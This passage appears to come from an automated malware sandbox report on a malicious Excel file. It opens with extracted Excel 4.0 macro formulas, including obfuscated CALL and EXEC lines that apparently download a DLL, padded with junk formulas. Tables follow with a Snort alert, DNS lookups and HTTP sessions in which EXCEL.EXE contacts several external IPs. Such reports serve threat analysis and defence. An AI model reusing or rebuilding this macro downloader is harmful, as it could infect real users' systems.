M20&""A"",AM30,'Doc2'!AR84,before.2.0.0.sheet!AM24,before.2.0.0.sheet!AO15&""1""&"".dll"",0,0)",,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL(""U""&AM19&""n"",AM20&""A"",AM30,'Doc2'!AR84,before.2.0.0
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/06/21-18:01:05.779242 | TCP | 2009897 | ET TROJAN Possible Windows executable sent when remote host claims to send html content | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 18:01:02.122705936 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.161501884 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.161607981 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.162374020 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.244944096 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.568733931 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.568774939 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.569022894 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.569272041 CEST | 49165 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.609659910 CEST | 80 | 49165 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.645234108 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.687805891 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:02.687912941 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.689251900 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:02.773426056 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:03.103004932 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:03.103032112 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:03.103112936 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:03.103337049 CEST | 49166 | 80 | 192.168.2.22 | 8.211.4.209 |
Apr 6, 2021 18:01:03.143615007 CEST | 80 | 49166 | 8.211.4.209 | 192.168.2.22 |
Apr 6, 2021 18:01:03.180855989 CEST | 49167 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 6, 2021 18:01:03.340634108 CEST | 80 | 49167 | 192.185.56.250 | 192.168.2.22 |
Apr 6, 2021 18:01:03.340747118 CEST | 49167 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 6, 2021 18:01:03.341989994 CEST | 49167 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 6, 2021 18:01:03.504129887 CEST | 80 | 49167 | 192.185.56.250 | 192.168.2.22 |
Apr 6, 2021 18:01:03.720449924 CEST | 80 | 49167 | 192.185.56.250 | 192.168.2.22 |
Apr 6, 2021 18:01:03.720530033 CEST | 80 | 49167 | 192.185.56.250 | 192.168.2.22 |
Apr 6, 2021 18:01:03.720664024 CEST | 49167 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 6, 2021 18:01:03.720741034 CEST | 49167 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 6, 2021 18:01:03.721364975 CEST | 49167 | 80 | 192.168.2.22 | 192.185.56.250 |
Apr 6, 2021 18:01:03.789477110 CEST | 49168 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 6, 2021 18:01:03.877712965 CEST | 80 | 49167 | 192.185.56.250 | 192.168.2.22 |
Apr 6, 2021 18:01:03.955492973 CEST | 80 | 49168 | 103.211.216.55 | 192.168.2.22 |
Apr 6, 2021 18:01:03.955655098 CEST | 49168 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 6, 2021 18:01:03.956880093 CEST | 49168 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 6, 2021 18:01:04.131800890 CEST | 80 | 49168 | 103.211.216.55 | 192.168.2.22 |
Apr 6, 2021 18:01:04.975133896 CEST | 80 | 49168 | 103.211.216.55 | 192.168.2.22 |
Apr 6, 2021 18:01:04.975301027 CEST | 80 | 49168 | 103.211.216.55 | 192.168.2.22 |
Apr 6, 2021 18:01:04.975364923 CEST | 49168 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 6, 2021 18:01:04.975779057 CEST | 49168 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 6, 2021 18:01:04.975795984 CEST | 49168 | 80 | 192.168.2.22 | 103.211.216.55 |
Apr 6, 2021 18:01:05.146706104 CEST | 80 | 49168 | 103.211.216.55 | 192.168.2.22 |
Apr 6, 2021 18:01:05.427691936 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.596868038 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.597033978 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.598428965 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.768717051 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779242039 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779300928 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779339075 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779380083 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779418945 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779468060 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779510975 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779550076 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779583931 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.779589891 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779618979 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.779630899 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.779655933 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.779687881 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.786556959 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.949870110 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.949943066 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.949973106 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950011969 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950050116 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950093031 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950133085 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950174093 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950213909 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950258017 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950306892 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950351954 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950390100 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950428009 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950429916 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.950459003 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950489998 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:05.950692892 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.950716019 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.951245070 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.951256990 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.952370882 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:05.954977036 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120527029 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120582104 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120624065 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120662928 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120703936 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120743036 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120783091 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120799065 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120804071 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120824099 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120846033 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120886087 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120903015 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120925903 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120930910 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120954990 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120958090 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.120966911 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.120980024 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121009111 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121047974 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121085882 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121093035 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121119022 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121123075 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121138096 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121155977 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121184111 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121186018 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121215105 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121223927 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121264935 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121264935 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121303082 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121305943 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121334076 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121357918 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121360064 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121395111 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121423006 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121429920 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121470928 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121483088 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121509075 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121510983 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121557951 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121566057 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121599913 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121611118 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121633053 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121659994 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121670961 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121702909 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121710062 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.121759892 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.121850014 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.291995049 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.292053938 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:06.292351961 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:06.292382956 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:10.950484037 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
Apr 6, 2021 18:01:10.950651884 CEST | 49169 | 80 | 192.168.2.22 | 111.118.215.222 |
Apr 6, 2021 18:01:40.950488091 CEST | 80 | 49169 | 111.118.215.222 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 6, 2021 18:01:02.055234909 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:02.110025883 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:02.585011005 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:02.641380072 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:03.118591070 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:03.176975012 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:03.739466906 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:03.785562038 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Apr 6, 2021 18:01:04.987745047 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 6, 2021 18:01:05.423103094 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 6, 2021 18:01:02.055234909 CEST | 192.168.2.22 | 8.8.8.8 | 0xd372 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:02.585011005 CEST | 192.168.2.22 | 8.8.8.8 | 0x7032 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:03.118591070 CEST | 192.168.2.22 | 8.8.8.8 | 0xad13 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:03.739466906 CEST | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 6, 2021 18:01:04.987745047 CEST | 192.168.2.22 | 8.8.8.8 | 0x82b3 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 6, 2021 18:01:02.110025883 CEST | 8.8.8.8 | 192.168.2.22 | 0xd372 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:02.641380072 CEST | 8.8.8.8 | 192.168.2.22 | 0x7032 | No error (0) | 8.211.4.209 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:03.176975012 CEST | 8.8.8.8 | 192.168.2.22 | 0xad13 | No error (0) | 192.185.56.250 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:03.785562038 CEST | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 103.211.216.55 | A (IP address) | IN (0x0001) | ||
Apr 6, 2021 18:01:05.423103094 CEST | 8.8.8.8 | 192.168.2.22 | 0x82b3 | No error (0) | 111.118.215.222 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:02.162374020 CEST | 0 | OUT | |
Apr 6, 2021 18:01:02.568733931 CEST | 1 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49166 | 8.211.4.209 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:02.689251900 CEST | 2 | OUT | |
Apr 6, 2021 18:01:03.103004932 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49167 | 192.185.56.250 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:03.341989994 CEST | 3 | OUT | |
Apr 6, 2021 18:01:03.720449924 CEST | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49168 | 103.211.216.55 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:03.956880093 CEST | 4 | OUT | |
Apr 6, 2021 18:01:04.975133896 CEST | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49169 | 111.118.215.222 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 6, 2021 18:01:05.598428965 CEST | 6 | OUT | |
Apr 6, 2021 18:01:05.779242039 CEST | 7 | IN |